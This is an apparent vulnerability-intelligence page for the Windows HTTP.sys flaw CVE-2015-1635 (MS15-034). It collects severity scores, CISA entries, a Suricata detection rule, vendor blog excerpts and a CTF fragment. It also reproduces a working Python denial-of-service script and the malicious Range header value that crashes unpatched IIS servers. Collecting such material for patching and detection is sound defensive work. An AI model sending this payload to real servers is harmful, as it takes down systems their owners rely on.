CVE-2015-1635
published 2015-04-14CVE-2015-1635: HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-08-10
Exploited in the wild
EPSS
100.00%
100.0th percentile
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Send an HTTP request with 'Range: bytes=0-18446744073709551615' to the target IIS server. A response of HTTP 416 ('Requested Range Not Satisfiable') indicates the host is vulnerable to CVE-2015-1635; a patched host will not reach UlAdjustRangeToContentSize and will not return 416. ↗
- →Exploitation requires at least two identical malformed Range requests: the first primes the kernel cache path (CacheMiss), and the second triggers BuildCacheEntry and SendCacheEntry with the overflowed length, causing a BSOD/crash. ↗
- →The Metasploit auxiliary module 'auxiliary/dos/http/ms15_034_ulonglongadd' can be used to check and trigger the DoS condition against CVE-2015-1635 targets. ↗
- ·The exploit PoC (exploit-db 36773) is marked UNTESTED by its author and should be treated as a detection/audit checker only, not a reliable weaponised exploit. ↗
- ·The vulnerability is actively exploited in the wild and DoS exploit code is widespread; patching or disabling IIS kernel caching as a workaround should be prioritised for Internet-facing Windows IIS servers. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p8wc-6g47-vh8j: HTTP
ghsa_unreviewed·2022-05-14
CVE-2015-1635 [HIGH] CWE-94 GHSA-p8wc-6g47-vh8j: HTTP
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
VulnCheck
Microsoft HTTP.sys Remote Code Execution Vulnerability
vulncheck·2015·CVSS 9.8
CVE-2015-1635 [CRITICAL] CWE-94 Microsoft HTTP.sys Remote Code Execution Vulnerability
Microsoft HTTP.sys Remote Code Execution Vulnerability
Microsoft HTTP protocol stack (HTTP.sys) contains a vulnerability that allows for remote code execution.
Affected: Microsoft HTTP.sys
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://web-assets.esetstatic.com/wls/2023/07/eset_threat_report_h12023.pdf; https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h22023.pdf; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12024.pdf; https://web-assets.esetstatic.com/wl
CISA
Microsoft HTTP.sys Remote Code Execution Vulnerability
cisa·2022-02-10·CVSS 9.8
CVE-2015-1635 [CRITICAL] CWE-94 Microsoft HTTP.sys Remote Code Execution Vulnerability
Vulnerability: Microsoft HTTP.sys Remote Code Execution Vulnerability
Affected: Microsoft HTTP.sys
Microsoft HTTP protocol stack (HTTP.sys) contains a vulnerability that allows for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2015-1635
Remediation Due Date: 2022-08-10
Suricata
ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)
suricata·2015-04-15·CVSS 9.8
CVE-2015-1635 [CRITICAL] ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)
ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Possible IIS Integer Overflow DoS (CVE-2015-1635)"; flow:established,to_server; http.request_header; header_lowercase; content:"range|3a 20|"; startswith; content:"18446744073709551615"; fast_pattern; distance:0; reference:cve,2015-1635; classtype:web-application-attack; sid:2020912; rev:6; metadata:created_at 2015_04_15, cve CVE_2015_1635, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_04_21;)
Exploit-DB
Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)
exploitdb·2015-04-16
CVE-2015-1635 Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)
Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)
---
#Tested on Win Srv 2012R2.
import socket,sys
if len(sys.argv)<=1:
sys.exit('Give me an IP')
Host = sys.argv[1]
def SendPayload(Payload, Host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host, 80))
s.send(Payload)
s.recv(1024)
s.close()
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
SendPayload(Init, Host)
SendPayload(Payload, Host)
Exploit-DB
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)
exploitdb·2015-04-15
CVE-2015-1635 Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)
Microsoft Windows - 'HTTP.sys' (PoC) (MS15-034)
---
/*
UNTESTED - MS15-034 Checker
THE BUG:
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
BY: [email protected]
Twitter: @rhcp011235
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int connect_to_server(char *ip)
{
int sockfd = 0, n = 0;
struct sockaddr_in serv_addr;
struct hostent *server;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) \n",argv[0]);
return 1;
}
printf("[*] Audit Started\n");
sockfd = connect_to_server(argv[1]);
write(sockfd, request, strlen(requ
Metasploit
MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
metasploit·CVSS 9.8
CVE-2015-1635 [CRITICAL] MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service.
Metasploit
MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
metasploit
MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
This module dumps memory contents using a crafted Range header and affects only Windows 8.1, Server 2012, and Server 2012R2. Note that if the target is running in VMware Workstation, this module has a high likelihood of resulting in BSOD; however, VMware ESX and non-virtualized hosts seem stable. Using a larger target file should result in more memory being dumped, and SSL seems to produce more data as well.
Nuclei
Microsoft Windows 'HTTP.sys' - Remote Code Execution
nuclei·CVSS 9.8
CVE-2015-1635 [CRITICAL] Microsoft Windows 'HTTP.sys' - Remote Code Execution
Microsoft Windows 'HTTP.sys' - Remote Code Execution
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Template:
id: CVE-2015-1635
info:
name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
author: Phillipo
severity: critical
description: |
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
impact: |
Attackers can execute arbitrary code remotely on Windows servers running vulnerab
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Qualys
MS15-034 Analysis And Remote Detection | Qualys
blogs_qualys·2015-04-20·CVSS 9.8
CVE-2015-1635 [CRITICAL] MS15-034 Analysis And Remote Detection | Qualys
It was a routine patch Tuesday and I was developing signatures for Qualys VM to identify vulnerabilities. But when I glanced at CVE-2015-1635 it was clear immediately that there was nothing routine about it. It’s a critical vulnerability which can allow remote attackers to take complete control of IIS web servers without have any prior credentials to the server. Now that is BIG! After releasing the VM signature I started working on this blog post which explains a bit further on how an attack using CVE-2015-1635 works. The blog post also explains the working of Qualys VM QID 91041.
### Background
HTTP Range allows HTTP clients to fetch the specified offset within the file on the HTTP server. It’s mainly used for ‘Resume broken downloads’. Let’s say you are downloading a file called ‘welco
Qualys
MS15-034 Analysis And Remote Detection | Qualys
blogs_qualys·2015-04-20·CVSS 9.8
CVE-2015-1635 [CRITICAL] MS15-034 Analysis And Remote Detection | Qualys
It was a routine patch Tuesday and I was developing signatures for Qualys VM to identify vulnerabilities. But when I glanced at CVE-2015-1635 it was clear immediately that there was nothing routine about it. It’s a critical vulnerability which can allow remote attackers to take complete control of IIS web servers without have any prior credentials to the server. Now that is BIG! After releasing the VM signature I started working on this blog post which explains a bit further on how an attack using CVE-2015-1635 works. The blog post also explains the working of Qualys VM QID 91041.
## Background
HTTP Range allows HTTP clients to fetch the specified offset within the file on the HTTP server. It’s mainly used for ‘Resume broken downloads’. Let’s say you are downloading a file called ‘welcom
Talos
Microsoft Patch Tuesday for April 2015: 11 Bulletins Released
blogs_talos·2015-04-14·CVSS 9.8
[CRITICAL] Microsoft Patch Tuesday for April 2015: 11 Bulletins Released
Today, Microsoft has released their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release sees a total of 11 bulletins being released which address 26 CVEs. The first 4 bulletins are rated Critical and address vulnerabilities within Internet Explorer, Office, IIS, and Graphics Component. The remaining 7 bulletins are rated Important and cover vulnerabilities within SharePoint, Task Scheduler, Windows, XML Core Services, Active Directory, .NET, and Hyper-V.
### Bulletins Rated CriticalMS15-032, MS15-033, MS15-034, and MS15-035 are rated Critical.
MS15-032 is this month’s Internet Explorer security bulletin with vulnerabilities in versions 6 through 11 being addressed. This month, 10 CVEs were addressed with the majority
Talos
Microsoft Patch Tuesday for April 2015: 11 Bulletins Released
blogs_talos·2015-04-14·CVSS 9.8
[CRITICAL] Microsoft Patch Tuesday for April 2015: 11 Bulletins Released
## Microsoft Patch Tuesday for April 2015: 11 Bulletins Released
Today, Microsoft has released their monthly set of security bulletins designed to address security vulnerabilities within their products. This month’s release sees a total of 11 bulletins being released which address 26 CVEs. The first 4 bulletins are rated Critical and address vulnerabilities within Internet Explorer, Office, IIS, and Graphics Component. The remaining 7 bulletins are rated Important and cover vulnerabilities within SharePoint, Task Scheduler, Windows, XML Core Services, Active Directory, .NET, and Hyper-V.
## Bulletins Rated Critical MS15-032, MS15-033, MS15-034, and MS15-035 are rated Critical.
MS15-032 is this month’s Internet Explorer security bulletin with vulnerabilities in versions 6 through 11 bein
Qualys
Patch Tuesday April 2015 | Qualys
blogs_qualys·2015-04-14·CVSS 7.8
[HIGH] Patch Tuesday April 2015 | Qualys
April’s Patch Tuesday continues the 2015 trend of high volume patches. This month we have a full set of 11 patches from Microsoft addressing 26 vulnerabilities.The vulnerabilities affect Windows and Office on both servers and workstations. In addition, Oracle is publishing their quarterly Critical Patch Update fixing 98 vulnerabilities in over 25 software categories, including Java, Oracle RDBMS and MySQL.
Add to that the fixes in Adobe, Mozilla and Google Chrome software that were initiated by the results of the PWN2OWN competition in Vancouver, and every defensive IT security professional will have their work doubled this month.
Let’s start with Microsoft: 11 bulletins from MS15-032 to MS15-042 with four of them critical. But priorities are clear this month:
Number one is MS15-033, th
Qualys
Patch Tuesday April 2015 | Qualys
blogs_qualys·2015-04-14·CVSS 7.8
[HIGH] Patch Tuesday April 2015 | Qualys
April’s Patch Tuesday continues the 2015 trend of high volume patches. This month we have a full set of 11 patches from Microsoft addressing 26 vulnerabilities.The vulnerabilities affect Windows and Office on both servers and workstations. In addition, Oracle is publishing their quarterly Critical Patch Update fixing 98 vulnerabilities in over 25 software categories, including Java, Oracle RDBMS and MySQL.
Add to that the fixes in Adobe, Mozilla and Google Chrome software that were initiated by the results of the PWN2OWN competition in Vancouver, and every defensive IT security professional will have their work doubled this month.
Let’s start with Microsoft: 11 bulletins from MS15-032 to MS15-042 with four of them critical. But priorities are clear this month:
Number one is MS15-033, th
arXiv
Enterprise Security Incident Analysis and Countermeasures Based on the T-Mobile Data Breach
arxiv_fulltext·2025-07-17
Enterprise Security Incident Analysis and Countermeasures Based on the T-Mobile Data Breach
## Abstract
This paper presents a comprehensive analysis of T-Mobile’s critical data breaches in 2021 and 2023, alongside a full-spectrum security audit targeting its systems, infrastructure, and publicly exposed endpoints. By combining case-based vulnerability assessments with active ethical hacking techniques—including Shodan reconnaissance, API misuse simulations, VNC brute-forcing, firmware reverse engineering, and web application scans—we uncover structural weaknesses persisting beyond the initial breach events. Building on these findings, we propose a multi-layered defensive strategy encompassing Zero Trust Architecture, granular role-based access control, network segmentation, firmware encryption using AES with integrity checks, and API rate limiting and token lifecycle control. Fi
CTF
EZ / devel
ctf_writeups·CVSS 9.8
CVE-2015-1635 [CRITICAL] EZ / devel
# recon
- windows: ping ttl 127
- port 21 : ftp
- mount on web directory
- `put` is allow -> can access the file from webserver.
- port 80/tcp open http Microsoft IIS httpd 7.5
- MS15-034
- CVE:CVE-2015-1635
we can use the directory in ftp to find web directory /aspnet_client/system_web/2_0_50727/
-nikto
```console
kali@kali:~/script$ nikto -h devel.htb
- Nikto v2.1.6
+ Target IP: 10.10.10.5
+ Target Hostname: devel.htb
+ Target Port: 80
+ Start Time: 2020-09-22 09:00:24 (GMT-4)
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
```
note that the site is use **ASP.NET**
so base on what we know, we can create a reverse shell to get foot hold
- ASP.NET : execute .asp or aspx, try out then you will know.
- I tried .asp and it didnt work so let go for .aspx
- meterpreter: `
HackerOne
[Urgent] Critical Vulnerability [RCE] on ███ vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
hackerone·2022-05-26·CVSS 9.8
CVE-2015-1635 [CRITICAL] [Urgent] Critical Vulnerability [RCE] on ███ vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
[Urgent] Critical Vulnerability [RCE] on ███ vulnerable to Remote Code Execution by exploiting MS15-034, CVE-2015-1635
@ashutosh7 found a ███████ server in Shodan, vulnerable to MS15-034, confirmed using Metasploit. Thanks for participating in the DoD VDP.
Found a ████ server in shodan, vulnerable to MS15-034. confirmed using Metasploit. will add the link for the writeup.
http://packetstormsecurity.com/files/131463/Microsoft-Windows-HTTP.sys-Proof-Of-Concept.htmlhttp://www.osvdb.org/120629http://www.securityfocus.com/bid/74013http://www.securitytracker.com/id/1032109https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034https://www.exploit-db.com/exploits/36773/https://www.exploit-db.com/exploits/36776/http://packetstormsecurity.com/files/131463/Microsoft-Windows-HTTP.sys-Proof-Of-Concept.htmlhttp://www.osvdb.org/120629http://www.securityfocus.com/bid/74013http://www.securitytracker.com/id/1032109https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034https://www.exploit-db.com/exploits/36773/https://www.exploit-db.com/exploits/36776/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2015-1635
2015-04-14
Published
2022-02-10
Added to CISA KEV
Exploited in the wild